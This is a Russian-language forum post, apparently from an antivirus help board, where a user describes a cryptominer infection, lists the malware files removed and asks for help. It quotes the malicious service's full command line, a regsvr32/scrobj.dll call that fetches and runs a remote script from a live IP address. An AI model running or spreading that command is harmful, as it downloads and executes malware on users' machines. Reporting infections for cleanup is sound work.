Перейти к содержанию

Поймал вирус (предположительно майнер)


Рекомендуемые сообщения

Опубликовано

Здравствуйте. Антивирус в системе не стоит, т.к. слабенькая.
На винчестере три раздела и два Windows - XP и Vista. В основном работаю на С: под ХР.
Поймал вирус (предположительно майнер) еще летом 2021 года. Прошло уже больше 3-х месяцев.
Грузит систему периодически до 100%.
Часть вируса удалил в начале осени, но вижу, что не всё. Удалил (возможно не всё перечислил):
a.bat
conhoy.exe
CONHOY.EXE-1EC51B50.pf11
shell.rar
c:\WINDOWS\Debug\item.dat
c:\WINDOWS\inf\aspnet\lsma12.exe
c:\System Volume Information\_restore{6B76C70F-5D28-4A66-9153-CE979AEAF7D5}\RP129\A0091495.INI  62байта
??? c:\WINDOWS\system32\n1.dat

Служба apzZ
C:\WINDOWS\system32\regsvr32.exe
apzZ    12%    apzZ    Auto on startup    Сервер регистрации, (C) Microsoft    Корпорация Майкрософт    cmd /c regsvr32 /s /u /n /i:http://185.47.128.124:8124/m17010.txt scrobj.dll    2021-08-29 14:07    own process    

Trojan.BitCoinMiner.TskLnk, C:\WINDOWS\inf\aspnet\lsma12.exe


В процессе работы над отчетом блокировался доступ к вэб-сайтам антивирусов.
Периодически в текстовых окнах само печатало длинный текст testtest......testtest.txt и также другой текст.
Также зависала система и испортился Malwarebytes.

По теме загрузки отчета есть несколько замечаний. При попытке запустить AutoLogger (скачанный по ссылке из Правил оформления) пишет "Пожалуйста, скачайте свежую версию автосборщика логов". В файле Date.ini из папки AutoLogger\AV поменял вручную дату на более близкую - только тогда AutoLogger запустился. Думаю, нужно в выложенном для скачивания архиве периодически менять дату в файле Date.ini на более актуальную.
И ещё. Базы обновить невозможно, так как пункт обновления в меню Файл не активен.

Буду благодарен за помощь.

тут лог

CollectionLog-2022.01.07-14.36.zip

  • thyrex закрыл тема
Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

    • Марко32
      Автор Марко32
      Начал замечать, что без ничего видеокарта работает на 20 процентов. Но когда открываю диспетчер задач оно сразу же пропадает (но видно на долю секунду).
      Сделал анализ в FRST. Пожалуйста, помогите.
      Addition.txt FRST.txt
    • bittok23
      Автор bittok23
      Поймал вирус, сначала решил провести проверку по антивирусу, проверка шла и внезапно комп выключается и врубается снова, потом еще раз и после этого антивирус сам удаляется с устройства. В диспетчере задач при заходе видно что процессор нагружен на 100 и резко падает. Антивирус ничего не нашел после полной проверки, майнер так и остался, что делать я не понимаю
    • Мелькор
      Автор Мелькор
      А вы можете и мне помочь пожалуйста? А то ноуту тяжело, а мне печально от этого((
      Desktop.rar
       
      Сообщение от модератора thyrex Перенесено из темы
    • trambler3
      Автор trambler3
      1. ОС переустановлена т.к. необходимо рабочее место.
      2. Атака произошла ночью в выходной день через компьютер пользователя. Сервер 1С не смогли зашифровать, только общедоступные папки (шару). Однако на сервере касперский нашел ransomware (к сожалению в панике удалил даже не записав точное название), так же почти на всех пользовательских компах был файл , определяющийся как вирус "AA_v3". При попытке восстановления с помощью, например, recuva видно удаленный файл, но он повреждён. Теневых копий нет. 
      F.7z
    • user344
      Автор user344
      Здравствуйте! Недавно компьютер в простое начинает переодически нагружаться до 100%, вентиляторы начинают крутить на полную в течении 5-10 минут, только начинаешь водить мышкой по рабочему столу, то сразу же нагрузка падает до дефолтных значений. Проверял лечащай утилитой др.веб и kvrt они вирусов не нашли.
      CollectionLog-2025.06.25-21.11.zip
×
×
  • Создать...